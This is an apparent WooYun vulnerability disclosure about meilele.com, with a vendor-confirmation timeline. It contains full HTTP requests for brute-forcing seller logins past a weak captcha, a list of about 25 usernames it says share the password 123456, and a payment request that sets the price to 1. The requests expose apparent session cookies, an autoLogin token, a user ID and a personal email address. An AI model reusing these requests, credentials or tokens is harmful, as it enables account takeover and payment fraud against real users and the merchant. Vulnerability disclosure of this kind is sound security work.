乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-20: 细节已通知厂商并且等待厂商处理中 2016-01-21: 厂商已经确认,细节仅向厂商公开 2016-01-31: 细节向核心白帽子及相关领域专家公开 2016-02-10: 细节向普通白帽子公开 2016-02-20: 细节向实习白帽子公开 2016-03-05: 细节向公众公开
都是看家具惹的祸...
1、爆破用户帐号
POST /act_seller_login/ HTTP/1.1Host: seller.meilele.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://seller.meilele.com/shop.html?act=shop_loginContent-Length: 74Cookie: aliyungf_tc=AQAAAIkktUeVZAcA4RogCgOS4Lyql1Sk; ECS_ID=j464ee7098aab635c066a4f8412e1bf0178d9bc2X-Forwarded-For: 10.32.26.225Connection: closeact=login&username=lirong&password=123456&captcha2=&datetime=1453267597272
虽然有验证码,但是感觉跟没有一样阿500人名爆破
chenchao 660chenfei 658wangfei 656zhoujie 655lixin 649lixin 649zhangyong 644ligang 643lixiang 642liushuai 642 641lirong 641wangning 639machao 639wangxue 638zhaowei 638liuyan 637lihua 637liuyan 637liqian 637lidan 636limei 636limin 635lijun 634lipeng 631
都是123456
2:支付
POST /user/?act=ajaxgetpaylink HTTP/1.1Host: www.meilele.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://www.meilele.com/mll_api/api/payContent-Length: 80Cookie: ECS_ID=j464ee7098aab635c066a4f8412e1bf0178d9bc2; aliyungf_tc=AQAAAIUkWzvqDggA4RogCkmTUups2ruV; RT=A; _i=17; _o=0; MA_si=i2snkcenskn; MLL_CID=ehinw6kf1p; region_name=%E5%85%A8%E5%9B%BD; __utma=184173242.1578908334.1453268083.1453268083.1453268083.1; __utmb=184173242.21.9.1453268226118; __utmc=184173242; __utmz=184173242.1453268083.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; pgv_pvi=7277789184; pgv_si=s2961014784; Hm_lvt_d91942b1e6dd95baed4560c0c6d8071b=1453268087; Hm_lpvt_d91942b1e6dd95baed4560c0c6d8071b=1453268540; _jzqa=1.1789671085672996600.1453268088.1453268088.1453268088.1; _jzqb=1.11.10.1453268088.1; _jzqc=1; _jzqckmp=1; ECS[email]=hao_lirong%40163.com; ECS[login_type]=mll; ECS[username]=lirong; autoLogin=VgHhEjJmzbCm3C860xohUI6pLnAqAX9aHk2LTIGSL6w%3D; meilele_login=1; user_id=965956; rember_username=lirong; utag=k0702*s0201*c0101*m0201*f1301*f1001*g0301; viewInfo=23035%2C1453268178612; bdshare_firstime=1453268182003; cart_number=1; isActiveUser=1; _qzja=1.1619587144.1453268087679.1453268087679.1453268087680.1453268526183.1453268539959.0.0.0.11.1; _qzjb=1.1453268087679.11.0.0.0; _qzjc=1; _qzjto=11.1.0X-Forwarded-For: 10.32.26.225Connection: keep-alivemerge=&order_sn=2016012051603&price=1&payment=alipay&pd_FrpId=&qr_code=&ispart=0
危害等级:中
漏洞Rank:5
确认时间:2016-01-21 14:40
谢谢
暂无